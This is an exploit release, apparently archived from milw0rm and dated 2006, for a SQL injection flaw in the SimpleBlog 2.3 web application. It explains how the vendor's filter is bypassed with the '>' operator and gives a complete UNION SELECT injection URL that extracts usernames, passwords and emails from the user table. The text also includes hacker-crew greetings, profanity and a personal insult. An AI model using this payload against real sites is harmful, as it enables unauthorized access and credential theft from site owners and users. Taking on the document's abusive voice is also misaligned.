74 lines
No EOL
4.2 KiB
Text
74 lines
No EOL
4.2 KiB
Text
_ _
|
|
__ _(_)_ __ ___| |_ __ _
|
|
\ \ / / | '_ \/ __| __/ _` |
|
|
\ V /| | |_) \__ \ || (_| |
|
|
\_/ |_| .__/|___/\__\__,_|
|
|
|_| AnD
|
|
_ _ _ _ _
|
|
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
|
|
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
|
|
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|
|
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
|
|
|
|
+-----------------------------------------------------------------+
|
|
| Vipsta & MurderSkillz fucking pwnt this webApp |
|
|
+-----------------------------------------------------------------+
|
|
| App Name: SimpleBlog 2.3 |
|
|
| App Author: 8pixel.net |
|
|
| App Version: <= 2.3 |
|
|
| App Type: Blog/Journal |
|
|
+-----------------------------------------------------------------+
|
|
| DETAILS |
|
|
+-----------------------------------------------------------------+
|
|
| Vulnerability: Remote SQL Injection |
|
|
| Requirements: Database with UNION support |
|
|
| Revisions: Note - This is a revision of another vuln |
|
|
| posted by Chironex Fleckeri |
|
|
+-----------------------------------------------------------------+
|
|
| CODE |
|
|
+-----------------------------------------------------------------+
|
|
| Vendor "implemented" a fix for SQL injection vulnerabilities. |
|
|
| however this bullshit was easily worked around by |
|
|
| Vipsta & MurderSkillz. |
|
|
| |
|
|
| Vendor attempted to remove illegal characters like ' and = |
|
|
| which stop most SQL injection vulnerabilities. However: |
|
|
| Vendor failed to remove '>' symbol. |
|
|
+-----------------------------------------------------------------+
|
|
| EXPLOIT |
|
|
+-----------------------------------------------------------------+
|
|
| SQL Injection String: |
|
|
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
|
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
|
|
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|
|
| TIMELINE |
|
|
+-----------------------------------------------------------------+
|
|
| 9/2/06 - Vendor Notified. |
|
|
| 9/2/06 - Vendor Replied. Threatens legal action. |
|
|
| 9/4/06 - Exploit Released with no details to vendor. |
|
|
+-----------------------------------------------------------------+
|
|
| SHOUTZ |
|
|
+-----------------------------------------------------------------+
|
|
| Everyone at g00ns.net - including: |
|
|
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
|
|
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
|
|
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
|
|
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
|
|
+-----------------------------------------------------------------+
|
|
| ADDITIONAL NOTES |
|
|
+-----------------------------------------------------------------+
|
|
| TeamSpeak: ts.g00ns.net |
|
|
| IRC: irc.g00ns.net |
|
|
+-----------------------------------------------------------------+
|
|
| PERSONAL STUFF |
|
|
+-----------------------------------------------------------------+
|
|
| Sess from g00ns.net IS A FUCKING MORON. |
|
|
+-----------------------------------------------------------------+
|
|
|
|
__
|
|
___ ___ / _|
|
|
/ _ \/ _ \| |_
|
|
| __/ (_) | _|
|
|
\___|\___/|_|.
|
|
|
|
# milw0rm.com [2006-09-04] |